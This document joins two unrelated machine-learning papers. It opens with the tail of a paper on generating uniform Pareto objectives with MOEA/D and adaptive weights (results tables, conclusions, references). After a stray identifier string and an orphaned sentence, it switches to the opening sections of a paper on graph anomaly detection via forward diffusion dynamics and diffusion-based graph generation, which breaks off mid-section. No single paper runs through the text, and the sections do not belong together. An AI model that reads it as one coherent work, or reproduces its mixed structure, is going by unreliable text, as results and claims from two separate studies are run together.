The implementation in this study relies on the pymoo (Blank & Deb, 2020) and PyTorch (Paszke et al., 2019) libraries. We utilize the simulated binary crossover (SBX) operator and the polynomial mutation technique (Deb & Beyer, 2001) for MOEA/D-based methods. Following the setting in pymoo, we do not maintain an external population (EP), since it can be computation- and storage-intensive, particularly when dealing with many objectives (Li & Landa-Silva, 2011). We compare our method with (1) the vanilla MOEA/D (Zhang & Li, 2007), (2) NSGA2 (Deb et al., 2002a), (3) MOEA/D with adaptive weight adjustment (MOEA/D-AWA) (Qi et al., 2014), (4) PaLam (Siwei et al., 2011), and (5) SMS-EMOA (Beume et al., 2007). Detailed descriptions of these methods and their implementations are deferred to Appendix B.1.

To assess performance, we utilize the hypervolume (\( HV \), ↑) (Guerreiro et al., 2020), sparsity (↓) (Xu et al., 2020), spacing (↓) (Schott, 1995), the minimal distance on the Pareto front (\( \delta_{\mathcal{T}} \), ↑), and its soft version (\( \tilde{\delta}_{\mathcal{T}} \), ↑) indicators. Please refer to Appendix B.2 for detailed descriptions of these indicators.
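For concreteness, the spacing indicator can be computed directly from a solution set; below is a minimal numpy sketch (ours) of one common formulation (Schott, 1995); the exact variant used in the experiments is described in Appendix B.2:

```python
import numpy as np

def spacing(Y):
    """Spacing indicator (one common formulation): the standard deviation of
    nearest-neighbor L1 distances; 0 means perfectly evenly spaced solutions."""
    n = len(Y)
    d = np.array([
        min(np.abs(Y[i] - Y[j]).sum() for j in range(n) if j != i)
        for i in range(n)
    ])
    return np.sqrt(((d - d.mean()) ** 2).sum() / (n - 1))
```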
Table 2: Running time (per 1k generations) of SMS-EMOA and the proposed method.

| Method | Running time (min) |
|--------------|------------------|
| SMS-EMOA | 1.21 |
| Proposed | 0.56 |

5.2 Results

The average results over five random seeds are displayed in Table 5 in Appendix B.4, along with the visualization results in Figures 10-17; detailed discussions of these results are also provided there.

Table 3: Results on RE21 and RE37, averaged over five random seeds, with the optimal indicator values highlighted in bold. For results on all problems, please refer to Appendix B.4.

| Problem | Method | HV (↑) | Spacing (↓) | Sparsity (↓) | \( \delta_{\mathcal{T}} \) (↑) | \( \tilde{\delta}_{\mathcal{T}} \) (↑) |
|---------|------------|--------|-------------|--------------|----------------|------------------|
| RE21 | NSGA2 | 1.226 | 0.066 | 0.022 | 0.024 | -0.063 |
| | SMS-EMOA | **1.252** | 0.028 | 0.017 | 0.095 | -0.028 |
| | MOEA/D | 1.246 | 0.086 | 0.024 | 0.072 | -0.058 |
| | MOEA/D-AWA | 1.250 | 0.028 | 0.017 | 0.088 | -0.031 |
| | PaLam | **1.252** | 0.025 | 0.017 | 0.101 | -0.027 |
| | Proposed | **1.252** | **0.002** | **0.016** | **0.123** | **-0.020** |
| RE37 | NSGA2 | 1.051 | 0.069 | **0.005** | 0.013 | -0.140 |
| | SMS-EMOA | **1.114** | **0.041** | **0.005** | 0.029 | -0.128 |
| | MOEA/D | 1.052 | 0.072 | 0.013 | 0 | -0.204 |
| | MOEA/D-AWA | 1.091 | 0.078 | 0.009 | 0.001 | -0.177 |
| | PaLam | 1.112 | 0.076 | 0.006 | 0 | -0.174 |
| | Proposed | 1.110 | 0.045 | **0.005** | **0.040** | **-0.086** |

Due to the presence of numerous local optima, gradient-based MOO methods fail on certain problems; we provide a concrete example of such a failure in Appendix B.6. The key findings from the experiments are summarized below.

① The proposed method achieves the optimal spacing indicator for two-objective problems, as shown in Figure 5 and Table 3. The spacing indicator is very close to zero, indicating that the distances between adjacent solutions are nearly equal. Compared with MOEA/D (Figure 5(a)), the proposed method generates more uniform objectives: the MOEA/D solutions are denser in the bottom-right area and sparser in the upper-left region, and thus fail to cover the entire PF as effectively as the proposed method.

② We observed that the HV-based method, SMS-EMOA, generates more diverse solutions than MOEA/D on RE21 and RE22 (see Table 5 in Appendix B.4). On the RE37 problem, numerous preferences do not intersect the Pareto front, leading MOEA/D to produce many duplicate Pareto objectives (\( \delta_{\mathcal{T}} = 0 \)). The proposed method mitigates this problem through adaptive weight adjustment. Figure 6 and Table 3 demonstrate that the solutions generated by the proposed method are the most uniformly distributed on the Pareto front. Notably, on RE37 the HV-based method tends to place solutions on the boundary of the Pareto front, which may be undesirable compared with the proposed method in certain applications.

③ Despite the general belief that hypervolume-based methods can generate diverse solutions in MOO (Auger et al., 2012; Guerreiro et al., 2020), our findings (see Table 5 in Appendix B.4 and Figure 9 in Appendix B.3) reveal that hypervolume indicators can be very similar while the distributions of solutions vary significantly. This highlights the need for a novel indicator, as proposed, for measuring and optimizing the Pareto objectives in MOO. Furthermore, the proposed method is 4.5x faster than SMS-EMOA on RE37 (Table 2), since it estimates and optimizes the uniformity of the solution set with only a few iterations; in most cases, the method simply runs MOEA/D under fixed preferences obtained from the neural PFL model.
6 CONCLUSIONS

This paper addresses a long-standing open problem in multiobjective evolutionary algorithms (MOEAs): the generation of a finite set of diverse/uniform Pareto objectives. It is the first paper to rigorously analyze the distribution of Pareto objectives, which sheds light on the understanding of solution generation in MOEAs. Building upon these analytical findings, the paper introduces a novel algorithm that achieves a uniform Pareto objective set through adaptive weight adjustment. Future research will focus on accelerating the optimization process and applying the algorithm to large-scale MOO problems.

REFERENCES

Zeyuan Allen-Zhu, Yuanzhi Li, and Zhao Song. A convergence theory for deep learning via over-parameterization. In International Conference on Machine Learning, pp. 242–252. PMLR, 2019.

Anne Auger, Johannes Bader, Dimo Brockhoff, and Eckart Zitzler. Hypervolume-based multiobjective optimization: Theoretical foundations and practical implications. Theoretical Computer Science, 425:75–103, 2012.

Toygun Basaklar, Suat Gumussoy, and Umit Y Ogras. PD-MORL: Preference-driven multi-objective reinforcement learning algorithm. arXiv preprint arXiv:2208.07914, 2022.

Nicola Beume, Boris Naujoks, and Michael Emmerich. SMS-EMOA: Multiobjective selection based on dominated hypervolume. European Journal of Operational Research, 181(3):1653–1669, 2007.

J. Blank and K. Deb. pymoo: Multi-objective optimization in Python. IEEE Access, 8:89497–89509, 2020.

Julian Blank, Kalyanmoy Deb, Yashesh Dhebar, Sunith Bandaru, and Haitham Seada. Generating well-spaced points on a unit simplex for evolutionary many-objective optimization. IEEE Transactions on Evolutionary Computation, 25(1):48–60, 2020.

S Borodachov, D Hardin, and E Saff. Asymptotics of best-packing on rectifiable sets. Proceedings of the American Mathematical Society, 135(8):2369–2380, 2007.

Sergiy V Borodachov, Douglas P Hardin, and Edward B Saff. Discrete Energy on Rectifiable Sets. Springer, 2019.

Massimiliano Caramia and Paolo Dell'Olmo. Multi-objective optimization. In Multi-objective Management in Freight Logistics: Increasing Capacity, Service Level, Sustainability, and Safety with Optimization Algorithms, pp. 21–51, 2020.

Minwoo Chae and Stephen G Walker. Wasserstein upper bounds of the total variation for smooth densities. Statistics & Probability Letters, 163:108771, 2020.

Weiyu Chen and James Kwok. Multi-objective deep learning with adaptive reference vectors. Advances in Neural Information Processing Systems, 35:32723–32735, 2022.

Indraneel Das and John E Dennis. Normal-boundary intersection: A new method for generating the Pareto surface in nonlinear multicriteria optimization problems. SIAM Journal on Optimization, 8(3):631–657, 1998.

Kalyanmoy Deb and Hans-Georg Beyer. Self-adaptive genetic algorithms with simulated binary crossover. Evolutionary Computation, 9(2):197–221, 2001.

Kalyanmoy Deb and Debayan Deb. Analysing mutation schemes for real-parameter genetic algorithms. International Journal of Artificial Intelligence and Soft Computing, 4(1):1–28, 2014.

Kalyanmoy Deb and Himanshu Jain. An evolutionary many-objective optimization algorithm using reference-point-based nondominated sorting approach, part I: Solving problems with box constraints. IEEE Transactions on Evolutionary Computation, 18(4):577–601, 2013.

Kalyanmoy Deb, Ram Bhushan Agrawal, et al. Simulated binary crossover for continuous search space. Complex Systems, 9(2):115–148, 1995.
Kalyanmoy Deb, Amrit Pratap, Sameer Agarwal, and TAMT Meyarivan. A fast and elitist multiobjective genetic algorithm: Nsga-ii. IEEE transactions on evolutionary computation, 6(2):182–197, 2002a. Kalyanmoy Deb, Lothar Thiele, Marco Laumanns, and Eckart Zitzler. Scalable multi-objective optimization test problems. In Proceedings of the 2002 Congress on Evolutionary Computation. CEC’02 (Cat. No. 02TH8600), volume 1, pp. 825–830. IEEE, 2002b.
bA5o5eZplk
At the initial stages, the egonet dissimilarity of anomalies significantly outweighs that of normal instances, as illustrated in Fig. 2. Therefore, it is worth considering whether exploiting this difference directly could lead to more efficient detection.
NEW RECIPES FOR GRAPH ANOMALY DETECTION: FORWARD DIFFUSION DYNAMICS AND GRAPH GENERATION

Anonymous authors
Paper under double-blind review

ABSTRACT

Distinguishing atypical nodes in a graph, known as graph anomaly detection, is more crucial than generic node classification in real applications such as fraud and spam detection. However, the lack of prior knowledge about anomalies and the extremely class-imbalanced data pose formidable challenges for learning the distributions of normal nodes and anomalies, which serves as the foundation of state-of-the-art methods. We introduce a novel paradigm (first recipe) for detecting graph anomalies, stemming from our empirical and rigorous analysis of the significantly distinct evolving patterns of anomalies and normal nodes when scheduled noise is injected into the node attributes, referred to as the forward diffusion process. Rather than modeling the data distribution, we present three non-GNN methods to capture these evolving patterns and achieve promising results on nine widely-used datasets, while mitigating the oversmoothing limitation and shallow architecture of GNN methods. We further investigate the generative power of denoising diffusion models to synthesize training samples that align with the original graph semantics (second recipe). In particular, we derive two principles for designing the denoising neural network and generating graphs. With our proposed graph generation method, we attain record-breaking performance, and our generated graphs are also capable of enhancing the results of existing methods. All the code and data are available at https://github.com/DiffAD/DiffAD.

1 INTRODUCTION

Learning the graph data distribution with regard to its structure and node attributes serves as the foundation of static graph analysis (Chami et al., 2022; Cui et al., 2019), especially for detecting anomalous graph entities (Akoglu et al., 2015; Ma et al., 2021). Given the learned data distributions, anomalies are significantly divergent from normal entities due to the deviating mechanisms that generate them. Though anomalies are far rarer and much less dominant than the majority, recognizing their presence and understanding their significant impacts are even more crucial for real-world applications: to list a few, fraud detection in online social networks (Dou et al., 2020; Wang et al., 2023b; Gao et al., 2023b), fake news detection in social media (Wang et al., 2023a), rare molecule detection for drug discovery, malware detection in computing systems, and brain health monitoring (Xu et al., 2022a; Ma et al., 2023).

More recently, graph neural networks (GNNs) have greatly advanced the frontier of graph machine learning, but learning the graph data distribution remains an open problem (Chen et al., 2022; Sun et al., 2023). Instead of solely learning either the structure distribution \( p(A) \) or the attribute distribution \( p(X) \), graph learning techniques aim to learn the joint distribution \( p(A, X) \), considering the complex relation between the graph structure and node attributes. In the realm of graph anomaly detection, effectively capturing the distributions of anomalies is even more challenging due to the lack of prior knowledge about them and the tremendous cost of acquiring labeled anomalies. Moreover, since anomalies are far fewer than normal entities, vanilla models will be biased toward learning normal entities given such extremely imbalanced data (Johnson & Khoshgoftaar, 2019).
Figure 1: Two recipes for graph anomaly detection.

Besides the challenges posed by the data, GNNs also encounter intrinsic technical limitations in anomaly detection (Azabou et al., 2023). Their fundamental message-passing (MP) mechanism undermines the effectiveness of learning the distributions of anomalies and normal nodes, since vanilla MP aggregates anomalous and normal nodes' features with each other. Such a scheme blends anomalies and normal nodes in the representation space (Liu et al., 2020) and prevents deeper GNN architectures, since nodes collapse together when stacking more MP layers (Keriven, 2022).

In this paper, we first explore a novel paradigm to detect anomalies on a static graph without the need to explicitly learn its data distribution or to employ MP-GNNs. Our analysis of the differences between anomalies and their egonet neighbors, called egonet dissimilarity, illustrates that anomalies and normal nodes can be separated by gradually injecting \( T \) scales of scheduled Gaussian noise into the node attributes, referred to as the forward diffusion process. Scrutinizing the egonet dissimilarity changes in this process (Fig. 2(a)), we find that anomalies experience a more dramatic drop in egonet dissimilarity than normal nodes. We recognize this unexplored anomaly detection paradigm as classifying nodes in terms of their evolving trajectories in the forward diffusion.

To address the shortage of knowledge about anomalies, we further investigate graph generation, assuming that high-quality synthesized data could help anomaly detectors learn a better decision boundary. Inspired by denoising-based generative models, we delve into the reverse diffusion process for graph generation, which denoises the data, and introduce two fundamental principles for designing the denoising neural network such that the generated graphs adhere to the original graph semantics. Inspecting the forward diffusion process through the lens of the graph's spectrum, we discover a progressive shift of the graph's spectral energy from lower to higher frequencies as the diffusion proceeds: as depicted in Fig. 2(b) and Fig. 3, the energy ratios of low-frequency signals (corresponding to smaller eigenvalues) decrease continuously from diffusion step 0 to 100%, while higher frequencies become more dominant. These observations underscore the need for the denoising network to 1) explore each node's egonet dissimilarity (capturing the local graph semantics) and 2) recover the low-frequency graph energy.

Upon these findings, we offer two fresh recipes for graph anomaly detection: 1) distinguishing anomalies based on their distinctive forward diffusion dynamics and 2) synthesizing additional samples to complement detectors (as depicted in Fig. 1). For learning the divergent dynamics of anomalies, we design three innovative non-GNN methods (§5), and for graph generation, we follow the principles and devise a novel generative graph diffusion framework for synthesizing graphs, particularly for anomaly detection (§6). The main contributions of this paper are:

1) A novel paradigm to detect graph anomalies. We, for the first time, propose to shift the focus of graph anomaly detection from learning a static data distribution to the exploration of dynamics in the forward diffusion process.
This new paradigm enables us to promptly apply non-GNN techniques to investigate graph data, thereby sidestepping the oversmoothing issues of MP-GNNs in anomaly detection. The promising results of our proposed non-GNN methods empirically underpin this as a potential research direction. 2) Two principles for designing the denoising-based graph diffusion model. Adhering to these principles, our model can generate supplementary and effective training samples to mitigate the shortage of labeled anomalies. Extensive experiments on real-world datasets demonstrate that these generated samples can significantly improve detection performance. 3) We rigorously analyze and prove our observations on the diffusion process, which will serve as a foundation for future work in graph anomaly detection.

2 PRELIMINARIES

Static attributed graph. A static attributed graph \( G = \{A, X\} \) comprises \( n \) nodes with attributes. The entry \( A_{i,j} \) of the adjacency matrix \( A \) is 1 if nodes \( v_i \) and \( v_j \) in \( G \) are directly connected, and 0 otherwise. The attribute matrix \( X = [x_i]_{n \times k} \) contains each node \( v_i \)'s \( k \)-dimensional attribute vector.

Egonet dissimilarity. The egonet dissimilarity \( \Omega = [\omega_i]_{n \times k} = LX \) quantifies how each node's attributes differ from those of its egonet neighbors, where \( L = I - D^{-\frac{1}{2}}AD^{-\frac{1}{2}} \) is the normalized graph Laplacian of \( G \) and \( D \) is the diagonal degree matrix.

Forward graph diffusion (process). Forward graph diffusion refers to injecting \( T \) scales of scheduled noise into the node attributes while keeping the graph structure fixed. At each diffusion step \( t \in \{0, \ldots, T-1\} \), the corrupted graph \( G_{t+1} = \{A, X_{t+1}\} \) is derived from \( G_t = \{A, X_t\} \), with \( G_0 = G \).

Generative graph data augmentation for graph anomaly detection. We define generative graph data augmentation as synthesizing additional graphs \( G_a = \{G_a^1, \ldots, G_a^{|G_a|}\} \) to enhance graph anomaly detection performance. Each \( G_a^i = \{A, X_a^i\} \) has the same structure as the original graph \( G \), and the attribute distributions satisfy \( p(X_a^i \mid A) \sim p(X \mid A) \).

Contextual anomalies and graph anomaly detection. In this paper, we aim to detect contextual anomalies, which are defined as nodes exhibiting significantly different attributes from their neighbors (Liu et al., 2022b). Detection is conducted with access to a small proportion of labeled data so as to simulate real scenarios. Given an attributed graph \( G \) containing both anomalies in \( V_1 \) and normal nodes in \( V_0 \), we aim to learn a classification function that maps each node \( v_i \in V \), \( V = V_1 \cup V_0 \), to its class label, which is 1 for anomalies and 0 for normal nodes, i.e., \( f : \{A, X\} \rightarrow y \in \{0, 1\}^n \). In practice, anomalies are far rarer than normal nodes, i.e., \( |V_1| \ll |V_0| \).

3 RELATED WORK

3.1 SEMI-/SUPERVISED GRAPH ANOMALY DETECTION

Anomalous node detection, particularly contextual anomaly detection, is a key topic in graph anomaly detection (Akoglu et al., 2015; Ma et al., 2021; Gavrilev & Burnaev, 2023). These anomalies are rare compared to the majority, but are pervasive in real-world scenarios. Concrete examples include fake news in social media, business fraudsters in financial systems, and malfunctioning cortices in brain networks.
Tremendous effort has been committed to learning the graph distribution and detecting the anomalies that violate it, and most recent approaches adopt MP-GNNs to investigate the abnormal patterns of anomalies (Dou et al., 2020; Tang et al., 2022; Liu et al., 2022b). However, due to the oversmoothing issue of MP-GNNs, straightforwardly applying them to anomaly detection is non-trivial, spurring Dou et al. (2020), Liu et al. (2020), and others to mitigate the negative impact of MP or to seek band-pass filters that capture the signals of anomalies (Tang et al., 2022). These approaches consider the technical challenges associated with GNNs, but solutions to the shortage of labeled anomalies still lack sufficient exploration. Others, such as Ding et al. (2019), Zheng et al. (2021), and Liu et al. (2021), aim to address this with unsupervised/contrastive learning techniques, but they only predict the irregularity (a continuous score) of each node and cannot explicitly classify anomalies. Although a human-defined threshold can be utilized to label anomalies, determining an effective threshold in the unsupervised setting is non-trivial in practice (Ma et al., 2021; Akoglu, 2021). Following Tang et al. (2022), we do not cover structural anomalies, which form denser links with other nodes (Liu et al., 2022b), as this type of anomaly only exhibits deviating structural patterns and can be effectively detected using structural statistics such as node degree and centrality.

3.2 DENOISING DIFFUSION PROBABILISTIC MODEL (DDPM)

Denoising diffusion probabilistic models (DDPMs) are a class of generative models built upon the forward diffusion process (diffusion process) and the reverse process (denoising process) (Ho et al., 2020).\(^1\) Typically, the diffusion process is defined as a Markov chain that progressively adds a sequence of scheduled Gaussian noise to corrupt the original data \( x_0 \) into standard Gaussian noise as follows:
\[ q(x_T | x_0) = \prod_{t=1}^{T} q(x_t | x_{t-1}) = N(x_T; \sqrt{\bar{\alpha}_T} x_0, (1 - \bar{\alpha}_T) I), \] (1)
where \( \bar{\alpha}_T = \prod_{t=1}^{T} (1 - \beta_t) \) and \( \beta_t \) is the variance of the noise at step \( t \). The denoising process is a reverse Markov chain that attempts to recover the original data from noise by
\[ p_\theta(x_{0:T}) := p(x_T) \prod_{t=1}^{T} p_\theta(x_{t-1} | x_t), \quad p_\theta(x_{t-1} | x_t) := N(x_{t-1}; \mu_\theta(x_t, t), \Sigma_\theta(x_t, t)), \] (2)
where the mean \( \mu_\theta \) and variance \( \Sigma_\theta \) of the distribution \( p_\theta(x_{t-1} | x_t) \) are learned using a deep neural network with parameters \( \theta \). By minimizing the Kullback-Leibler (KL) divergence between \( q(x_{t-1} | x_t, x_0) \) and \( p_\theta(x_{t-1} | x_t) \), that is,
\[ \arg \min_\theta D_{KL}(q(x_{t-1} | x_t, x_0) \| p_\theta(x_{t-1} | x_t)), \] (3)
the neural network captures the original data distribution. Consequently, new samples (i.e., \( x_0^a \)) adhering to the original data distribution can be generated by simply sampling \( x_T \sim N(0, I) \) and running the denoising process.

\(^1\) We use the terms 'graph anomalies' and 'anomalous nodes', as well as 'node features' and 'node attributes', interchangeably, and use 'anomalies' to specifically denote contextual anomalies. The italic \( T \) denotes the number of noise scales, while the superscript '\( \top \)' stands for the transpose of a matrix. To eliminate confusion, we use 'egonet dissimilarity' to specifically denote how each node's attributes differ from those of its egonet neighbors, distinct from the embedding method used in previous works.
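A minimal PyTorch sketch (ours) of the closed-form forward sampler implied by Eq. (1), with an illustrative linear variance schedule:

```python
import torch

# Linear variance schedule; alpha_bar[t] = prod_{s<=t} (1 - beta_s).
T = 1000
betas = torch.linspace(1e-4, 2e-2, T)
alpha_bar = torch.cumprod(1.0 - betas, dim=0)

def forward_sample(x0, t, alpha_bar):
    """Draw x_t ~ q(x_t | x_0) in closed form (Eq. (1))."""
    eps = torch.randn_like(x0)
    xt = alpha_bar[t].sqrt() * x0 + (1.0 - alpha_bar[t]).sqrt() * eps
    return xt, eps

x0 = torch.randn(16, 8)               # toy 'clean' attributes
xt, eps = forward_sample(x0, 500, alpha_bar)
```

The returned noise `eps` is exactly the regression target used by the simplified DDPM objective (and by Eq. (20) in Section 6).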
Due to space limitations, we provide additional related work on graph anomaly detection and explanations of DDPMs (including Eq. (3)) in Appendix A.

4 Preliminary Study: Anomalies' Dynamics and Graph Energy Shifts in the Forward Diffusion Process

The power of diffusion models in discerning different modes of the data stems from the forward and reverse diffusion processes. Our work investigates both processes and unveils two significant observations, particularly in the context of graph anomaly detection.

4.1 Preliminary Study Setup

Our preliminary study explores (1) the deviating dynamics of graph anomalies and (2) changes in the graph spectral energy distribution during the forward diffusion. We conduct the study on Cora by fixing the graph structure and gradually injecting noise into the node attributes. Specifically, we generate the noise using two variance schedulers, i.e., the linear and cosine schedulers, while the node attributes are randomly drawn from two Gaussian distributions, \( N(1, 1) \) for the normal class and \( N(1, 5) \) for anomalies, following Tang et al. (2022). Our observations are as follows.

4.2 Observation I - More Dramatic Changes in Anomalies' Egonet Dissimilarities

Since contextual anomalies have markedly distinct features compared to their egonet neighbors, we ask what deviating patterns anomalies manifest during the forward diffusion process. Measuring the average egonet dissimilarity \( \frac{1}{|V_y|} \sum_{v_j \in V_y} \omega_j \) for anomalies (\( y = 1 \)) and normal nodes (\( y = 0 \)) at each forward step, we surprisingly find that anomalies (the red line) undergo more substantial changes than normal nodes (the blue line), as depicted in Fig. 2(a).

Proposition 1 Given \( T \) scales of noise from a linear or cosine scheduler, when injecting them gradually into the node attributes through the forward diffusion process, the egonet dissimilarities of anomalies change more dramatically than those of normal nodes.

Accordingly, we propose to detect anomalies by investigating the dynamics of the egonet dissimilarity \( \Omega_t \) in the diffusion process, as an alternative to learning the graph distribution. We recognize this as a novel paradigm for graph anomaly detection. Since learning \( p(A, X) \) is no longer mandatory, other powerful algorithms can be promptly adopted for detecting graph anomalies, breaking the limitations of MP-GNNs. As a pioneer in this line, we hereafter present three non-GNN models to capture such dynamics, namely FSC, TRC-TRANS, and TRC-MLP, built upon the LSTM (Hochreiter & Schmidhuber, 1997), the Transformer (Vaswani et al., 2017), and the MLP (Goodfellow et al., 2016), respectively. The proof of this proposition is provided in Appendix B.

4.3 Observation II - Recovering the Low-Frequency Energy for Graph Generation

Considering the recent success of DDPMs in generating high-quality data samples (Ho et al., 2020; Nichol & Dhariwal, 2021; Song et al., 2021), we are motivated to synthesize additional training samples to enrich the training set and complement anomaly detectors. However, the critical capabilities that the denoising neural network should possess for synthesizing training samples, especially in the context of graph anomaly detection, remain unexplored.
We inspect the particular changes in the graph spectrum across the forward diffusion. Consider an original graph signal \( x \) (a column of \( X \)), a sequence of corrupted signals \( (x_1, \ldots, x_T) \) in the forward diffusion process (by Eq. (1)), and the eigenvectors \( U = (u_1, \ldots, u_n) \) of the graph Laplacian \( L \), in which \( u_l \) is the eigenvector corresponding to the \( l \)-th smallest eigenvalue. We quantify the energy ratio of a particular frequency (rank \( l \)) at diffusion step \( t \) as \( \gamma_l(x_t, L) = (\hat{x}_l^t)^2 / \sum_{i=1}^{n} (\hat{x}_i^t)^2 \), where \( \hat{x}^t = U^\top x_t = (\hat{x}_1^t, \ldots, \hat{x}_l^t, \ldots, \hat{x}_n^t)^\top \) is the graph-Fourier-transformed signal. Taking \( l \) as a threshold, we identify the signals \( (\hat{x}_1^t, \ldots, \hat{x}_l^t) \) as low-frequency signals and the rest as high-frequency signals. As depicted in Fig. 2(b), the ratios of low-frequency signals gradually decrease while higher frequencies become more significant along the forward diffusion process. We further delve into the overall ratios of low- and high-frequency signals with regard to different thresholds at each step \( t \) by measuring the accumulated energy ratio at rank \( l \), following Tang et al. (2022), as:
\[ \Gamma_l(x_t, L) = \sum_{i=1}^{l} \gamma_i(x_t, L). \] (4)
We find that the accumulated energy shifts to higher frequencies (as the diffusion proceeds, the accumulated energy ratio for eigenvalues below a low threshold (e.g., 0.3) decreases continuously, as depicted in Fig. 3), and we have the following expectation regarding \( \Gamma_l(x_t, L) \).

**Proposition 2** The expectation of the low-frequency energy ratio, \( \mathbb{E}_{x \sim N(\mu, \sigma^2)}[\Gamma_l(x_t, L)] \), is monotonically decreasing during the forward diffusion process.

This indicates that the graph spectral energy distribution puts less weight on low-frequency eigenvalues at step \( t \) than at step \( t-1 \); hence, to denoise \( x_t \) into \( x_{t-1} \), the denoising network needs to recover the low-frequency energy. The proof is in Appendix C. Ultimately, we identify two principles for designing denoising networks for DDPM-based graph generation.

**Principle I** (from Observation I). The denoising neural network should be capable of capturing the local information in egonets (the graph's local semantics), such that the prior distribution \( p(X_a \mid A) \) of the generated graph aligns with the original distribution \( p(X \mid A) \), enabling the classifier to learn a more effective decision boundary to distinguish anomalies.

**Principle II** (from Observation II). The denoising neural network needs to recover the low-frequency energy.
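The quantities in Eq. (4) are easy to reproduce; here is a minimal numpy sketch (ours, with an illustrative ring graph) showing how noise moves energy out of the low frequencies:

```python
import numpy as np

def accumulated_energy_ratio(x_t, L, l):
    """Gamma_l(x_t, L) from Eq. (4): the fraction of spectral energy carried
    by the l lowest-frequency components of the (corrupted) signal x_t."""
    _, U = np.linalg.eigh(L)                # eigenvectors, ascending eigenvalues
    energy = (U.T @ x_t) ** 2               # squared graph Fourier coefficients
    return energy[:l].sum() / energy.sum()

# Toy check on a ring graph: a smooth signal keeps nearly all of its energy
# in the low frequencies, while added Gaussian noise spreads it upward.
n = 64
A = np.roll(np.eye(n), 1, axis=0) + np.roll(np.eye(n), -1, axis=0)
L = np.eye(n) - A / 2.0                     # normalized Laplacian of the ring
x0 = np.sin(2 * np.pi * np.arange(n) / n)
print(accumulated_energy_ratio(x0, L, 8))                       # close to 1
print(accumulated_energy_ratio(x0 + np.random.randn(n), L, 8))  # noticeably lower
```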
5 OUR APPROACH I - LEARNING DIFFUSION DYNAMICS FOR GRAPH ANOMALY DETECTION

Conforming to our novel paradigm of discerning anomalies from the diffusion dynamics, in this section we first introduce a new data structure for storing \( \Omega_t \) across the forward diffusion, followed by our proposed sequence- and trajectory-learning-based detection methods. Our algorithms are summarized in Appendix I.

5.1 Storing the Graph Information in Forward Diffusion

The forward diffusion process corrupts the original node attributes with \( T \) scales of scheduled noise. Eventually, the node attributes become standard Gaussian noise, \( X_T \sim q(X_T | A) := \mathcal{N}(X_T; 0, I) \), and for any discrete step \( t \in \{0, \ldots, T\} \), we can promptly infer the corrupted graph \( G_t = \{A, X_t\} \) based on Eq. (1) as follows:
\[ X_t \sim q(X_t | X, A) = \mathcal{N}(X_t; \sqrt{\bar{\alpha}_t}X, (1 - \bar{\alpha}_t)I). \] (5)
We then employ a tensor \( G \in \mathbb{R}^{n \times T \times k} \) to store \( \{\Omega_t = LX_t\}_{t=0}^T \) at all diffusion steps. Specifically, the 2-D slice \( G_{i,:,:} = (\omega_0^i, \ldots, \omega_T^i)^\top \) encapsulates node \( v_i \)'s egonet dissimilarity from step 0 to step \( T \), and the 1-D slice \( G_{i,t,:} = \omega_t^i \in \mathbb{R}^k \) denotes \( v_i \)'s egonet dissimilarity at a particular step \( t \). Since the memory cost of \( G \) is proportional to \( T \), we present a skip-step algorithm to reduce its size and provide a batch implementation to facilitate training (Appendix D). Given \( G \), we reformulate graph anomaly detection as classifying nodes with regard to their corresponding 2-D slices and propose the following methods.

5.2 Forward Sequence Classification (FSC)

Each 2-D slice \( G_{i,:,:} \) is essentially a sequence of multivariate features derived from \( v_i \)'s egonet dissimilarity in the diffusion process. Our goal is to encode the long- and short-term evolving patterns of the forward sequence into a hidden state for classifying nodes. For node \( v_i \), FSC revisits \( \omega_t^i \) at each diffusion step and generates its hidden state \( h_t^i \in \mathbb{R}^d \) using an LSTM:
\[ \begin{align*} \tau_t^i &= \sigma(W_{\tau}G_{i,t,:} + U_{\tau}h_{t+1}^i + b_{\tau}), \\ f_t^i &= \sigma(W_fG_{i,t,:} + U_fh_{t+1}^i + b_f), \\ g_t^i &= \tanh(W_gG_{i,t,:} + U_gh_{t+1}^i + b_g), \\ o_t^i &= \sigma(W_oG_{i,t,:} + U_oh_{t+1}^i + b_o), \\ c_t^i &= f_t^i \odot c_{t+1}^i + \tau_t^i \odot g_t^i, \\ h_t^i &= o_t^i \odot \tanh(c_t^i), \end{align*} \] (6)
where \( h_t^i, c_t^i, \tau_t^i, f_t^i, g_t^i \), and \( o_t^i \) are the hidden state, cell state, input gate, forget gate, cell gate, and output gate at step \( t \), respectively; \( \sigma \) is the logistic sigmoid, \( \odot \) denotes the Hadamard product, and the initial \( h_T^i \sim \mathcal{N}(0, I) \). We then predict the node's probabilities of being normal or anomalous through a fully connected layer:
\[ f(h_0^i; W_c, b_c) := \text{SOFTMAX}(h_0^iW_c + b_c), \] (9)
where \( W_c \in \mathbb{R}^{d \times 2} \) and \( b_c \in \mathbb{R}^2 \) are trainable parameters. Given the extremely imbalanced data, we adjust the weights of anomalies and normal nodes in the training objective so that the model focuses equally on both classes. This class-wise training objective is to minimize:
\[ L = - \sum_{y \in \{0, 1\}} \sum_{v_i \in V_y} \frac{1}{|V_y|} \log \psi(v_i | y), \] (10)
where \( \psi(v_i | y) \) is the predicted probability of \( v_i \) being anomalous (\( y = 1 \)) or normal (\( y = 0 \)).
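A minimal PyTorch sketch (ours) of building the tensor \( G \) and running an FSC-style sequence classifier over it; we use the off-the-shelf `nn.LSTM` rather than the gate-level recursion of Eq. (6), and flip the sequence so that the last output plays the role of \( h_0^i \):

```python
import torch
import torch.nn as nn

def build_trajectories(L_norm, X, alpha_bar):
    """Stack Omega_t = L X_t over all diffusion steps into G of shape (n, T, k).
    L_norm: normalized graph Laplacian; alpha_bar: cumulative noise schedule."""
    slices = []
    for t in range(len(alpha_bar)):
        noise = torch.randn_like(X)
        Xt = alpha_bar[t].sqrt() * X + (1 - alpha_bar[t]).sqrt() * noise  # Eq. (5)
        slices.append(L_norm @ Xt)                                        # Omega_t
    return torch.stack(slices, dim=1)

class FSC(nn.Module):
    def __init__(self, k, d):
        super().__init__()
        self.lstm = nn.LSTM(k, d, batch_first=True)
        self.head = nn.Linear(d, 2)                 # classifier of Eq. (9)
    def forward(self, G):                           # G: (n, T, k)
        h, _ = self.lstm(G.flip(1))                 # read from step T back to 0
        return self.head(h[:, -1])                  # per-node logits
```

The logits are trained with the class-weighted objective of Eq. (10), e.g., via `nn.CrossEntropyLoss(weight=...)` with weights inversely proportional to the class sizes.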
5.3 Trajectory Representation-Based Classification (TRC)

While FSC predicts a hidden state from the forward sequence to distinguish anomalies, TRC learns a representation of each node's trajectory and detects anomalies upon it. To capture the whole trajectory, for each node \( v_i \), TRC first encodes \( G_{i,t,:} \) at each diffusion step \( t \) into a latent space and then reads the trajectory representation out from all the steps:
